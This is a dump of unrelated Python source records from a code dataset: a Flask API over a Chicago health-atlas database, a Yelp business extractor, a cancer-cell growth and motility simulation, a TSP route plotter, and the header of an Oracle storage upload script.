|
Python
|
app.py
|
tanasijevich/project3
|
cd4870727e31bad47868625a59a565f4b96d80a5
|
[
"MIT"
] | null | null | null |
app.py
|
tanasijevich/project3
|
cd4870727e31bad47868625a59a565f4b96d80a5
|
[
"MIT"
] | null | null | null |
app.py
|
tanasijevich/project3
|
cd4870727e31bad47868625a59a565f4b96d80a5
|
[
"MIT"
] | null | null | null |
# import necessary libraries
# from models import create_classes
from sqlalchemy.ext.automap import automap_base
from sqlalchemy import create_engine
from flask import (Flask)
# Read data from csv
#csv_file = "data/Chicago Health Atlas.csv"
#df = pd.read_csv(csv_file)
#df.head()
#df.rename(columns={"VRDIBR_2015-2019":"VRDIBR_2015_2019","VRDIAR_2015-2018":"VRDIAR_2015_2018","VRDTH_2015-2019":"VRDTH_2015_2019","VRCAR_2015-2019":"VRCAR_2015_2019","VRADR_2015-2019":"VRADR_2015_2019","HDX_2015-2019":"HDX_2015_2019"},inplace=True)
#creating sqlite engine to create database
#engine = create_engine('sqlite:///data/Chicago_Health_database.db')
#engine = create_engine('sqlite:///C:/Users/doyel/Desktop/project3_flask_ex1/data/mydatabase.db')
#Table name : Chicago_Health_Atlas
#df.to_sql('Chicago_Health_Atlas',con=engine,if_exists='replace')
#####################################################################
engine = create_engine("sqlite:///data/mydatabase.db")
# reflect an existing database into a new model
Base = automap_base()
# reflect the tables
Base.prepare(engine, reflect=True)
# Save reference to the table
print(Base.classes.keys())
Healthatlas = Base.classes.healthatlas
#Actors = Base.classes.actors
#################################################
# Flask Setup
#################################################
app = Flask(__name__)
# ---------------------------------------------------------
# Web site
# ---------------------------------------------------------
# API called when the "data.html" page loads, returning the community information table
# API called when the user selects a disease from the list on the "data.html" page
if __name__ == "__main__":
app.run()
| 42.136095
| 576
| 0.72869
|
# import necessary libraries
# from models import create_classes
import pandas as pd
import os
import sqlalchemy
from sqlalchemy.ext.automap import automap_base
from sqlalchemy.orm import Session
from sqlalchemy import create_engine, func
from sqlite3 import connect
import json
from flask import (
Flask,
render_template,
jsonify,
request,
redirect,
jsonify)
# Read data from csv
#csv_file = "data/Chicago Health Atlas.csv"
#df = pd.read_csv(csv_file)
#df.head()
#df.rename(columns={"VRDIBR_2015-2019":"VRDIBR_2015_2019","VRDIAR_2015-2018":"VRDIAR_2015_2018","VRDTH_2015-2019":"VRDTH_2015_2019","VRCAR_2015-2019":"VRCAR_2015_2019","VRADR_2015-2019":"VRADR_2015_2019","HDX_2015-2019":"HDX_2015_2019"},inplace=True)
#creating sqlite engine to create database
#engine = create_engine('sqlite:///data/Chicago_Health_database.db')
#engine = create_engine('sqlite:///C:/Users/doyel/Desktop/project3_flask_ex1/data/mydatabase.db')
#Table name : Chicago_Health_Atlas
#df.to_sql('Chicago_Health_Atlas',con=engine,if_exists='replace')
#####################################################################
engine = create_engine("sqlite:///data/mydatabase.db")
# reflect an existing database into a new model
Base = automap_base()
# reflect the tables
Base.prepare(engine, reflect=True)
# Save reference to the table
print(Base.classes.keys())
Healthatlas = Base.classes.healthatlas
#Actors = Base.classes.actors
#################################################
# Flask Setup
#################################################
app = Flask(__name__)
# ---------------------------------------------------------
# Web site
@app.route("/")
def home():
return render_template("index.html")
@app.route("/data.html")
def data():
return render_template("data.html")
@app.route("/templates/map.html")
def map():
return render_template("map.html")
@app.route("/templates/d3_chart.html")
def d3_chart():
return render_template("d3_chart.html")
# ---------------------------------------------------------
# API called when the "data.html" page loads, returning the community information table
@app.route("/api/community")
def community_grid():
session = Session(engine)
results = session.query(Healthatlas.Name,Healthatlas.Median_Household_Income,Healthatlas.Poverty_Rate,Healthatlas.Receiving_Food_Stamps,Healthatlas.Public_Assistance_Income,Healthatlas.High_School_Grad_Rate, Healthatlas.College_Grad_Rate,Healthatlas.Non_Hispanic_White,Healthatlas.Non_Hispanic_Black,Healthatlas.Asian_Pacific_Islander,Healthatlas.Hispanic_or_Latino,Healthatlas.Population_All,Healthatlas.Population_Infants,Healthatlas.Population_Juveniles,Healthatlas.Population_Young_Adults,Healthatlas.Population_Middle_Aged_Adults,Healthatlas.Population_Seniors).all()
#results = session.query(Healthatlas.Name,Healthatlas.GEOID, Healthatlas.Population,Healthatlas.Longitude, Healthatlas.Latitude).all()
#results = pd.read_sql('SELECT Name,GEOID,Population,Longitude,Latitude FROM Chicago_Health_Atlas', engine)
#results = engine.execute("SELECT Name,GEOID,Population,Longitude,Latitude FROM Chicago_Health_Atlas").fetchall()
#session.query(Movies.title, Movies.director, Movies.year, Movies.rating, Movies.imdb_votes, Movies.imdb_score).all()
results = [list(r) for r in results]
table_results = {
"table": results
}
session.close()
return jsonify(table_results)
# API called when the user selects a disease from the list on the "data.html" page
@app.route("/api/deceases/<decease>")
def deceases(decease):
session = Session(engine)
if decease == "diabetes":
results = session.query(Healthatlas.Name, Healthatlas.Population_All, Healthatlas.Longitude, Healthatlas.Latitude, Healthatlas.VRDIAR_2015_2019, Healthatlas.HDX_2015_2019, Healthatlas.HCSSP_2016_2018, Healthatlas.HCSSMKP_2016_2018).all()
elif decease == "diabetes_related":
results = session.query(Healthatlas.Name, Healthatlas.Population_All, Healthatlas.Longitude, Healthatlas.Latitude, Healthatlas.VRDIBR_2015_2019, Healthatlas.HDX_2015_2019, Healthatlas.HCSSP_2016_2018, Healthatlas.HCSSMKP_2016_2018 ).all()
elif decease == "alzheimer":
results = session.query(Healthatlas.Name, Healthatlas.Population_All, Healthatlas.Longitude, Healthatlas.Latitude, Healthatlas.VRADR_2015_2019, Healthatlas.HDX_2015_2019, Healthatlas.HCSSP_2016_2018, Healthatlas.HCSSMKP_2016_2018).all()
elif decease == "cancer":
results = session.query(Healthatlas.Name, Healthatlas.Population_All, Healthatlas.Longitude, Healthatlas.Latitude, Healthatlas.VRCAR_2015_2019, Healthatlas.HDX_2015_2019, Healthatlas.HCSSP_2016_2018, Healthatlas.HCSSMKP_2016_2018).all()
elif decease == "hypertension":
results = session.query(Healthatlas.Name, Healthatlas.Population_All, Healthatlas.Longitude, Healthatlas.Latitude, Healthatlas.HCSHYTP_2016_2018, Healthatlas.HDX_2015_2019, Healthatlas.HCSSP_2016_2018, Healthatlas.HCSSMKP_2016_2018).all()
elif decease == "adult_obesity":
results = session.query(Healthatlas.Name, Healthatlas.Population_All, Healthatlas.Longitude, Healthatlas.Latitude, Healthatlas.HCSOBP_2016_2018, Healthatlas.HDX_2015_2019, Healthatlas.HCSSP_2016_2018, Healthatlas.HCSSMKP_2016_2018).all()
elif decease == "coronary_heart_disease":
results = session.query(Healthatlas.Name, Healthatlas.Population_All, Healthatlas.Longitude, Healthatlas.Latitude, Healthatlas.VRCHDR_2015_2019, Healthatlas.HDX_2015_2019, Healthatlas.HCSSP_2016_2018, Healthatlas.HCSSMKP_2016_2018).all()
#elif decease == "all" :
# results = session.query(Healthatlas.Name, Healthatlas.Population_All, Healthatlas.Longitude, Healthatlas.Latitude, Healthatlas.VRDTH_2015_2019, Healthatlas.HDX_2015_2019).all()
else:
results = session.query(Healthatlas.Name,Healthatlas.Population_All, Healthatlas.Longitude, Healthatlas.Latitude, Healthatlas.VRADR_2015_2019, Healthatlas.HDX_2015_2019, Healthatlas.HCSSP_2016_2018, Healthatlas.HCSSMKP_2016_2018).all()
results = [list(r) for r in results]
name = [result[4] for result in results]
hardship = [result[5] for result in results]
soda = [result[6] for result in results]
smoke = [result[7] for result in results]
decease_results = {
"decease_name": name,
"hd_index": hardship,
"soda_con":soda,
"smoking":smoke,
}
session.close()
return jsonify(decease_results)
@app.route("/api/geojson")
def map_data():
with open('data/geo.json', 'r') as file:
your_data = json.loads(file.read())
# print(your_data)
return jsonify(your_data)
@app.route('/api/d3_chart/<field_x>/<field_y>')
def d3_chart_api(field_x, field_y):
session = Session(engine)
x_column = getattr(Healthatlas, field_x)
y_column = getattr(Healthatlas, field_y)
results = session.query(x_column, y_column).all()
results = [list(r) for r in results]
session.close()
return jsonify(results)
if __name__ == "__main__":
app.run()
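A small sketch (not part of the app) showing how the JSON endpoints above can be exercised with Flask's built-in test client; it assumes data/mydatabase.db is present, and the two column names passed to the d3_chart route are taken from the queries above.
def _smoke_test():
    client = app.test_client()
    community = client.get("/api/community").get_json()
    print(len(community["table"]), "community rows")
    diabetes = client.get("/api/deceases/diabetes").get_json()
    print(sorted(diabetes.keys()))  # decease_name, hd_index, smoking, soda_con
    scatter = client.get("/api/d3_chart/Poverty_Rate/HCSOBP_2016_2018").get_json()
    print(scatter[:2])
# _smoke_test()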
| 0
| 5,028
| 0
| 0
| 0
| 0
| 0
| 76
| 314
|
e202b3b1b0dd6517b189261d661038ca7be2cad9
| 2,377
|
py
|
Python
|
lambda/extract_yelp/extract.py
|
Rdbaker/barfinder
|
63c75dc99f2371371aa8072078175558d1917864
|
[
"BSD-3-Clause"
] | null | null | null |
lambda/extract_yelp/extract.py
|
Rdbaker/barfinder
|
63c75dc99f2371371aa8072078175558d1917864
|
[
"BSD-3-Clause"
] | null | null | null |
lambda/extract_yelp/extract.py
|
Rdbaker/barfinder
|
63c75dc99f2371371aa8072078175558d1917864
|
[
"BSD-3-Clause"
] | null | null | null |
import logging
from models import business as Business
logging.getLogger().setLevel(logging.INFO)
def business_exists(yelp_id, conn):
"""Return True if the business exists."""
return conn.execute(Business.select().where(Business.c.yelp_id == yelp_id))\
.first() is not None
def delete_business(yelp_id, conn):
"""Delete the business with the given yelp id."""
return conn.execute(Business.delete().where(Business.c.yelp_id == yelp_id))
| 32.561644
| 80
| 0.640303
|
import logging
from models import tag as Tag, business as Business, business_tag_join_table
logging.getLogger().setLevel(logging.INFO)
def parse_yelp_business(business):
return {
'source': 'yelp',
'raw_yelp_data': business,
'yelp_id': business.get('id'),
'name': business.get('name', 'UNKNOWN'),
'price': len(business.get('price', '')),
'latitude': business.get('coordinates', {}).get('latitude'),
'longitude': business.get('coordinates', {}).get('longitude'),
'phone': business.get('phone'),
}
def business_exists(yelp_id, conn):
"""Return True if the business exists."""
return conn.execute(Business.select().where(Business.c.yelp_id == yelp_id))\
.first() is not None
def delete_business(yelp_id, conn):
"""Delete the business with the given yelp id."""
return conn.execute(Business.delete().where(Business.c.yelp_id == yelp_id))
def tag_exists(alias, conn):
return conn.execute(Tag.select().where(Tag.c.alias == alias))\
.first() is not None
def create_tag(tag, conn):
conn.execute(Tag.insert().values(**tag))
def get_or_create_tags(tags, conn):
names = []
for tag in tags:
if not tag_exists(tag['alias'], conn):
create_tag(tag, conn)
names.append(tag['alias'])
return conn.execute(Tag.select().where(Tag.c.alias.in_(names))).fetchall()
def create_business(business, conn):
conn.execute(Business.insert().values(**business))
return conn.execute(Business.select().where(Business.c.yelp_id ==
business['yelp_id'])).first()
def link_business_to_tags(business, tags, conn):
for tag in tags:
conn.execute(
business_tag_join_table.insert().values(tag_id=tag.id,
business_id=business.id))
def extract_business(business_dict, engine):
conn = engine.connect()
if business_exists(business_dict['id'], conn):
delete_business(business_dict['id'], conn)
business = parse_yelp_business(business_dict)
tags = get_or_create_tags(business_dict['categories'], conn)
business = create_business(business, conn)
link_business_to_tags(business, tags, conn)
logging.info('successfully processed business: {}'
.format(business_dict['id']))
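A hedged usage sketch: the business dict mirrors the keys read by parse_yelp_business and extract_business above (the shape of a Yelp Fusion business record), and the database URL is a placeholder for whatever engine the models module targets.
def _example_run():
    from sqlalchemy import create_engine
    engine = create_engine("postgresql://user:pass@localhost/barfinder")  # placeholder URL
    sample_business = {
        "id": "example-yelp-id",
        "name": "Example Bar",
        "price": "$$",
        "coordinates": {"latitude": 44.97, "longitude": -93.27},
        "phone": "+15555550123",
        "categories": [{"alias": "bars", "title": "Bars"}],  # shape assumed from tag usage
    }
    extract_business(sample_business, engine)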
| 0
| 0
| 0
| 0
| 0
| 1,706
| 0
| 37
| 161
|
5ddcfbd5c5a68beee52f20bf25f10cc164269d23
| 14,652
|
py
|
Python
|
doubling_agent/motility_functions.py
|
lkmartin90/doubling_agent
|
73a7f06aa43c5fa51ea1263b72ebe6f8319bf894
|
[
"MIT"
] | 1
|
2020-12-03T15:47:24.000Z
|
2020-12-03T15:47:24.000Z
|
doubling_agent/motility_functions.py
|
lkmartin90/doubling_agent
|
73a7f06aa43c5fa51ea1263b72ebe6f8319bf894
|
[
"MIT"
] | null | null | null |
doubling_agent/motility_functions.py
|
lkmartin90/doubling_agent
|
73a7f06aa43c5fa51ea1263b72ebe6f8319bf894
|
[
"MIT"
] | null | null | null |
###
# Broadly the same as "basic_functions.py" but updated to include motility
# intentionally trying to keep them separate so as not to slow down the basic version
###
| 36.35732
| 115
| 0.574597
|
from random import random
from random import choice
import numpy as np
import plotly.express as px
import struct
import operator
###
# Broadly the same as "basic_functions.py" but updated to include motility
# intentionally trying to keep them separate so as not to slow down the basic version
###
class MotilityParameters:
def __init__(self, switch_to_m_rate, switch_to_p_rate, motility_rate):
# 0 motility state is proliferating, 1 is moving
self.m = switch_to_m_rate
self.p = switch_to_p_rate
self.rate = motility_rate
self.dict = {0: switch_to_m_rate, 1: switch_to_p_rate + motility_rate}
class ParametersBasic:
def __init__(self, s_division_rate, epsilon, p_division_rate, apoptosis_rate):
self.s = s_division_rate
self.p = p_division_rate
self.e = epsilon
self.a = apoptosis_rate
self.dict = {0: s_division_rate, 1: p_division_rate, 2: apoptosis_rate}
self.death = {0: 0, 1: 0, 2: apoptosis_rate}
class ParametersQuiescent:
def __init__(self, k1, k2, k3, k4, k5, k6, k7, k8):
# s>s+s :k1, s>s+p:k2, s>dead:k3, p>p+p:k4, p>dead:k5, p>Q:k6, D>dead:k7, Q>s:k8
self.k1 = k1
self.k2 = k2
self.k3 = k3
self.k4 = k4
self.k5 = k5
self.k6 = k6
self.k7 = k7
self.k8 = k8
# rate of something happening for each state
# note the slight change in notation, 0 is stem cell, 1 progenitor, 2 differentiated and 3 quiescent
self.dict = {0: k1+k2+k3, 1: k4+k5+k6, 2: k7, 3: k8}
self.death = {0: k3, 1: k5, 2: k7, 3: 0}
def cancer_seed_single(cells, switch_3d):
    # creates the initial cancer stem cell at [0,0]
if switch_3d:
cells.update({(0, 0, 0): [0, 0, 0]})
else:
cells.update({(0,0): [0, 0, 0]})
def cancer_seed_single_quiescent(cells):
    # creates the initial cancer cell (quiescent, state 3) at [0,0]
cells.update({(0,0): [3, 0, 0]})
def cancer_seed_single_progen(cells):
    # creates the initial cancer cell (progenitor, state 1) at [0,0]
cells.update({(0,0): [1, 0, 0]})
def timing_update_all(cells, params, mot_params):
# update second entry in dict to give a timing based on the first entry, the state
# time is log(1/rand_no)/rate
# Now want to account for fact that cells can either change motility state or move or divide
# options:
# motility state 1: can either move, change motility state, or die
    # motility state 0: can either change motility state or go through all division choices
# including death (already written)
for k in cells.keys():
state = cells.get(k)[0]
mot = cells.get(k)[2]
div = params.dict[state] # division or death rate for motility 0
m_or_c = mot_params.dict[mot] # move or change rate
mot_death = params.death[state] # death rate for motility state 1
if mot == 0:
rate = div+m_or_c
else:
rate = m_or_c + mot_death
cells.update({k: [state, np.log(1/random())/rate, mot]})
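# Minimal sketch (not part of the original module) of the waiting-time rule described above:
# the total rate for a cell is the sum of the rates of every event available in its current
# motility state, and the waiting time is the exponential draw log(1/u)/rate. The rates used
# here are illustrative numbers only.
def example_waiting_time(division_or_death_rate=1.0, switch_or_move_rate=0.1):
    total_rate = division_or_death_rate + switch_or_move_rate
    return np.log(1/random())/total_rate  # ~ Exponential(total_rate), same form as timing_update_all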
def choose_new_pos(pos, cells):
    # Identifies a free position for a cell to divide or move into. A 2d square grid is used:
    # a neighbouring site is picked at random; if it is already occupied it is excluded from
    # the candidates and a new random pick is made, until a free site is found or none remain.
i = pos[0]
j = pos[1]
neighbours = [(i+1, j), (i-1, j), (i, j-1), (i, j+1)]
options = [0, 1, 2, 3]
cont = 0
new_pos = 0
while cont == 0 and len(options) > 0:
pick = choice(options)
check = neighbours[pick]
if check in cells:
options.remove(pick)
else:
cont = 1
new_pos = check
return new_pos
def choose_new_pos_eq(pos, cells):
    # chooses a new position by identifying all the free spaces first and then assigning them all equal probability
i = pos[0]
j = pos[1]
neighbours = [(i+1, j), (i-1, j), (i, j-1), (i, j+1)]
options = [0, 1, 2, 3]
for n in range(len(neighbours)):
if neighbours[n] in cells:
options.remove(n)
if len(options) > 0:
new_pos = neighbours[choice(options)]
else:
new_pos = 0
return new_pos
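# Illustrative usage only: both neighbour-selection routines take the dict of occupied sites
# and return either a free neighbouring coordinate or 0 when no neighbour is free. The toy
# two-cell configuration below is made up.
def example_neighbour_choice():
    occupied = {(0, 0): [0, 0, 0], (1, 0): [1, 0, 0]}     # two cells on the 2d grid
    by_rejection = choose_new_pos((0, 0), occupied)       # redraws until an empty site is hit
    by_enumeration = choose_new_pos_eq((0, 0), occupied)  # lists the empty sites, then picks one
    return by_rejection, by_enumeration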
def choose_new_pos_3d(pos, cells):
# 3d version of "choose_new_pos", the same method is used
i = pos[0]
j = pos[1]
k = pos[2]
# this currently assumes only square transitions on the cubic grid, may want to alter
neighbours = [(i + 1, j, k), (i - 1, j, k), (i, j + 1, k), (i, j - 1, k), (i, j, k + 1), (i, j, k - 1)]
options = [0, 1, 2, 3, 4, 5]
cont = 0
new_pos = 0
while cont == 0 and len(options) > 0:
pick = choice(options)
check = neighbours[pick]
if check in cells:
options.remove(pick)
else:
cont = 1
new_pos = check
return new_pos
def choose_new_pos_3d_eq(pos, cells):
    # 3d counterpart of "choose_new_pos_eq"; note it currently uses the same rejection method as choose_new_pos_3d rather than enumerating the free sites first
i = pos[0]
j = pos[1]
k = pos[2]
# this currently assumes only square transitions on the cubic grid, may want to alter
neighbours = [(i + 1, j, k), (i - 1, j, k), (i, j + 1, k), (i, j - 1, k), (i, j, k + 1), (i, j, k - 1)]
options = [0, 1, 2, 3, 4, 5]
cont = 0
new_pos = 0
while cont == 0 and len(options) > 0:
pick = choice(options)
check = neighbours[pick]
if check in cells:
options.remove(pick)
else:
cont = 1
new_pos = check
return new_pos
def move_cell(cells, pos, state, switch_3d):
# moves the cell
if switch_3d:
new_location = choose_new_pos_3d(pos, cells)
else:
new_location = choose_new_pos(pos, cells)
if new_location != 0:
del cells[pos]
cells.update({new_location: [state, 0, 1]})
def update_cell_basic(cells, pos, params, switch_3d, mot_params):
# updates a given cell based on the current state of that cell
# pos is string describing position
# time is from random number generator giving time of interaction
# cells is dict describing all cells in the tumour
state = cells.get(pos)[0]
mot = cells.get(pos)[2]
# Once motility is included first thing is to make a decision on whether the cell moves, divides, or switches
# to a different motility state. Need to check that an appropriate time step is being used still.
mot_check = random()
if mot == 1:
# Can move, cell can either switch motility state or move or die
if mot_check < mot_params.p/(mot_params.dict.get(mot) + params.death.get(state)):
            # then the motility state changes
cells.update({pos: [state, 0, abs(mot-1)]})
elif mot_check < mot_params.dict.get(mot)/(mot_params.dict.get(mot) + params.death.get(state)):
# The cell moves
move_cell(cells, pos, state, switch_3d)
else:
# cell death
del cells[pos]
else:
# No motility, can either switch state or go to division decisions
if mot_check < mot_params.m/(mot_params.dict.get(mot) + params.dict.get(state)):
            # then the motility state changes
cells.update({pos: [state, 0, abs(mot - 1)]})
            # The cell divides or dies, so we can just move on to that section, as we have
            # already conditioned on the probability of it happening
else:
if switch_3d:
daughter = choose_new_pos_3d(pos, cells)
else:
daughter = choose_new_pos(pos, cells)
if state == 0:
# if it's a stem cell there are 2 possibilities, S > S + S, S > S + P
# generate random number to determine fate, compare to epsilon
r_num = random()
if r_num < params.e:
# divide > S + S
if daughter != 0:
cells.update({daughter: [0, 0, 0]})
else:
# divide > S + P
if daughter != 0:
cells.update({daughter: [1, 0, 0]})
elif state == 1:
                # if it's a progenitor cell there are 2 possibilities, P > P + P, P > D
# generate random number to determine fate, start by assuming each happens with equal chance
r_num = random()
if r_num < 0.5:
# P > P + P
if daughter != 0:
cells.update({daughter: [1, 0, 0]})
else:
# P > D
cells.update({pos: [2, 0, 0]})
else:
                # If it is a differentiated cell the only possible state change is death
del cells[pos]
def update_cell_quiescent(cells, pos, params, switch_3d, mot_params):
# updates a given cell based on the current state of that cell
# pos is string describing position
# time is from random number generator giving time of interaction
# cells is dict describing all cells in the tumour
state = cells.get(pos)[0]
mot = cells.get(pos)[2]
# Once motility is included first thing is to make a decision on whether the cell moves, divides, or switches
# to a different motility state. Need to check that an appropriate time step is being used still.
mot_check = random()
if mot == 1:
# Can move, cell can either switch motility state or move or die
if mot_check < mot_params.p / (mot_params.dict.get(mot) + params.death.get(state)):
            # then the motility state changes
cells.update({pos: [state, 0, abs(mot - 1)]})
elif mot_check < mot_params.dict.get(mot) / (mot_params.dict.get(mot) + params.death.get(state)):
# The cell moves
move_cell(cells, pos, state, switch_3d)
else:
# cell death
del cells[pos]
else:
# No motility, can either switch state or go to division decisions
if mot_check < mot_params.m / (mot_params.dict.get(mot) + params.dict.get(state)):
            # then the motility state changes
cells.update({pos: [state, 0, abs(mot - 1)]})
else:
if switch_3d:
daughter = choose_new_pos_3d(pos, cells)
else:
daughter = choose_new_pos(pos, cells)
if state == 0:
# if it's a stem cell there are 3 possibilities, S > S + S, S > S + P and S > dead
# generate random number to determine fate
r_num = random()
if r_num < params.k1/params.dict.get(0):
# divide > S + S
if daughter != 0:
cells.update({daughter: [0, 0, 0]})
elif r_num < (params.k1+params.k2)/params.dict.get(0):
# divide > S + P
if daughter != 0:
cells.update({daughter: [1, 0, 0]})
else:
# die
del cells[pos]
elif state == 1:
                # if it's a progenitor cell there are 3 possibilities, P > P + P, P > D, P > Q
# generate random number to determine fate
r_num = random()
if r_num < params.k4/params.dict.get(1):
# P > P + P
if daughter != 0:
cells.update({daughter: [1, 0, 0]})
elif r_num < (params.k4+params.k5)/params.dict.get(1):
# P > D
cells.update({pos: [2, 0, 0]})
else:
# P > Q
cells.update({pos: [3, 0, 0]})
elif state == 2:
                # If it is a differentiated cell the only possible state change is death
del cells[pos]
else:
                # If it's quiescent, the only possible fate is to return to a stem cell
cells.update({pos: [0, 0, 0]})
def animate(animation_df, r, name):
# animate the simulations using plotly and save as a .html
animation_df['coord'] = animation_df[['x', 'y']].values.tolist()
animation_df['coord'] = animation_df['coord'].apply(lambda x: np.array(x))
#print(animation_df)
if len(animation_df['coord'].values[0]) > 2:
print("currently cannot animate for 3d")
raise ValueError()
mapping = {0: 'stem cell', 1: 'progenitor cell', 2: 'differentiated cell', 3: 'quiescent cell'}
animation_df = animation_df.replace({'state': mapping})
animation_df = animation_df.append(
{'state': 'differentiated cell', 'count': 0, 'coord': 0, 'x': 10000, 'y': 10000},
ignore_index=True)
animation_df = animation_df.append(
{'state': 'progenitor cell', 'count': 0, 'coord': 0, 'x': 10000, 'y': 10000},
ignore_index=True)
animation_df = animation_df.append(
{'state': 'quiescent cell', 'count': 0, 'coord': 0, 'x': 10000, 'y': 10000},
ignore_index=True)
fig = px.scatter(animation_df, x="x", y="y", animation_frame="count",
color='state', size_max=55, range_x=[-50, 50], range_y=[-50, 50])
fig.update_traces(marker=dict(size=12))
fig.layout.updatemenus[0].buttons[0].args[1]["frame"]["duration"] = 20
fig.show()
fig.write_html(name + '/ani_' + str(r) + '.html')
def read_from_file(file_name, switch_3d):
# read data from binary file in the form: time step, x, y, state, motility
if switch_3d:
struct_fmt = '=iiiiii' # 6 ints
else:
struct_fmt = '=iiiii' # 5 ints
struct_len = struct.calcsize(struct_fmt)
struct_unpack = struct.Struct(struct_fmt).unpack_from
results = []
with open(file_name, "rb") as f:
while True:
data = f.read(struct_len)
if not data: break
s = struct_unpack(data)
results.append(s)
return results
def calculate_timestep(params, mot_params):
# calculates timestep based on the probability of 2 or more events happening in a timestep (<0.01)
max_rate = max(params.dict.items(), key=operator.itemgetter(1))[1] + \
max(mot_params.dict.items(), key=operator.itemgetter(1))[1]
# playing it safe by summing max of each
lambert = 0.135157
step = lambert/max_rate
print('exact timestep from calculation', step)
if step > 0.1:
return step // 0.1 * 0.1
elif step > 0.01:
return step // 0.01 * 0.01
else:
return step // 0.001 * 0.001
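# Usage sketch with illustrative rates only: the exact step derived above is floored to a
# multiple of 0.1, 0.01 or 0.001 (whichever bracket it falls in) before being returned.
def example_timestep():
    params = ParametersBasic(s_division_rate=0.5, epsilon=0.1, p_division_rate=0.5, apoptosis_rate=0.2)
    mot_params = MotilityParameters(switch_to_m_rate=0.2, switch_to_p_rate=0.2, motility_rate=0.5)
    return calculate_timestep(params, mot_params)  # exact step ~0.11 here, returned as 0.1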
| 0
| 0
| 0
| 1,247
| 0
| 12,698
| 0
| -3
| 523
|
7c713c20032eec8a8f8dbf77f8cd9a9bca904c31
| 1,454
|
py
|
Python
|
TSP.py
|
ccfelius/TravelingSalesMan
|
ebc3b960859590623c0eb301545cd093c41d157a
|
[
"MIT"
] | 1
|
2020-12-10T17:36:39.000Z
|
2020-12-10T17:36:39.000Z
|
TSP.py
|
ccfelius/TravelingSalesMan
|
ebc3b960859590623c0eb301545cd093c41d157a
|
[
"MIT"
] | null | null | null |
TSP.py
|
ccfelius/TravelingSalesMan
|
ebc3b960859590623c0eb301545cd093c41d157a
|
[
"MIT"
] | 1
|
2021-01-05T13:08:07.000Z
|
2021-01-05T13:08:07.000Z
|
""" TSP SIMULATED ANNEALING """
# Imports
import matplotlib.pyplot as plt
import pandas as pd
import numpy as np
# read data from file
filename = "eil51.tsp"
f = open(f"TSP-configurations/{filename}.txt", "r")
network = f.readlines()[6:-1]
# create dictionary to store coordinates
nodes = dict()
# split data and put in dict
for node in network:
node = [int(x) for x in node.rstrip().split(' ')]
nodes[node[0]] = node[1:]
x = [x[0] for x in nodes.values()]
y = [y[1] for y in nodes.values()]
# load in data of optimal path
data = pd.read_csv("data/eil51.tsp.tsp-batch-20.txt", sep="\t")
colname = "428.87"
z = list(map(float,list(data[f'{colname}-19'])))
# optimum so far (costs = 428.87175639203394)
# r= [1.0, 32, 11, 38, 5, 37, 17, 4, 18, 47, 12, 46, 51.0, 27, 6, 48, 23, 7, 43, 24, 14, 25, 13, 41, 40, 19, 42, 44, 15, 45, 33, 39, 10, 49, 9, 30, 34, 21, 50, 16, 2, 29, 20, 35, 36, 3, 28, 31, 26, 8, 22, 1.0]
temp = []
# get coordinates of each point
for item in z:
temp.append(nodes[item])
temp = np.array(temp)
# path = [temp[i:i+2] for i in range(len(temp)-2+1)]
# print(path)
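# Hedged sanity check (eil51 is assumed to be a Euclidean TSPLIB instance): re-summing the
# point-to-point distances along the plotted route should land close to the cost quoted in
# the column header above.
tour_length = sum(np.linalg.norm(temp[i + 1] - temp[i]) for i in range(len(temp) - 1))
print(f"recomputed tour length: {tour_length:.2f}")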
# Plot the nodes and coordinates
fig, ax = plt.subplots()
ax.scatter(x, y, color="deeppink")
for i, txt in enumerate(nodes.keys()):
ax.annotate(txt, (x[i], y[i]))
ax.plot(*temp.T, color="deeppink", alpha=0.5)
ax.set_title(f"Shortest Route: {filename}, costs: {colname}", fontsize=16)
#
plt.savefig("plots/eil51-opt-route-3.png")
plt.show()
| 25.508772
| 209
| 0.636176
|
""" TSP SIMULATED ANNEALING """
# Imports
import matplotlib.pyplot as plt
import pandas as pd
import numpy as np
# read data from file
filename = "eil51.tsp"
f = open(f"TSP-configurations/{filename}.txt", "r")
network = f.readlines()[6:-1]
# create dictionary to store coordinates
nodes = dict()
# split data and put in dict
for node in network:
node = [int(x) for x in node.rstrip().split(' ')]
nodes[node[0]] = node[1:]
x = [x[0] for x in nodes.values()]
y = [y[1] for y in nodes.values()]
# load in data of optimal path
data = pd.read_csv("data/eil51.tsp.tsp-batch-20.txt", sep="\t")
colname = "428.87"
z = list(map(float,list(data[f'{colname}-19'])))
# optimum so far (costs = 428.87175639203394)
# r= [1.0, 32, 11, 38, 5, 37, 17, 4, 18, 47, 12, 46, 51.0, 27, 6, 48, 23, 7, 43, 24, 14, 25, 13, 41, 40, 19, 42, 44, 15, 45, 33, 39, 10, 49, 9, 30, 34, 21, 50, 16, 2, 29, 20, 35, 36, 3, 28, 31, 26, 8, 22, 1.0]
temp = []
# get coordinates of each point
for item in z:
temp.append(nodes[item])
temp = np.array(temp)
# path = [temp[i:i+2] for i in range(len(temp)-2+1)]
# print(path)
# Plot the nodes and coordinates
fig, ax = plt.subplots()
ax.scatter(x, y, color="deeppink")
for i, txt in enumerate(nodes.keys()):
ax.annotate(txt, (x[i], y[i]))
ax.plot(*temp.T, color="deeppink", alpha=0.5)
ax.set_title(f"Shortest Route: {filename}, costs: {colname}", fontsize=16)
#
plt.savefig("plots/eil51-opt-route-3.png")
plt.show()
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
35b4a123604f3ad39f518c8cd7cd58c05193a395
| 7,579
|
py
|
Python
|
common-python/rest_wrappers/oc/oc/upload_storage_object.py
|
LaudateCorpus1/atg-commerce-iaas
|
f1ae31657fc0111a5c019d46a28a3c81aae1acb2
|
[
"MIT"
] | 28
|
2016-11-07T14:03:25.000Z
|
2022-02-01T08:46:52.000Z
|
common-python/rest_wrappers/oc/oc/upload_storage_object.py
|
LaudateCorpus1/atg-commerce-iaas
|
f1ae31657fc0111a5c019d46a28a3c81aae1acb2
|
[
"MIT"
] | 3
|
2016-11-09T13:23:03.000Z
|
2018-04-05T15:49:22.000Z
|
common-python/rest_wrappers/oc/oc/upload_storage_object.py
|
LaudateCorpus1/atg-commerce-iaas
|
f1ae31657fc0111a5c019d46a28a3c81aae1acb2
|
[
"MIT"
] | 13
|
2016-10-27T17:59:38.000Z
|
2022-02-18T04:38:38.000Z
|
#!/usr/bin/python
# Copyright (c) 2013, 2014-2017 Oracle and/or its affiliates. All rights reserved.
"""Provide Module Description
"""
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
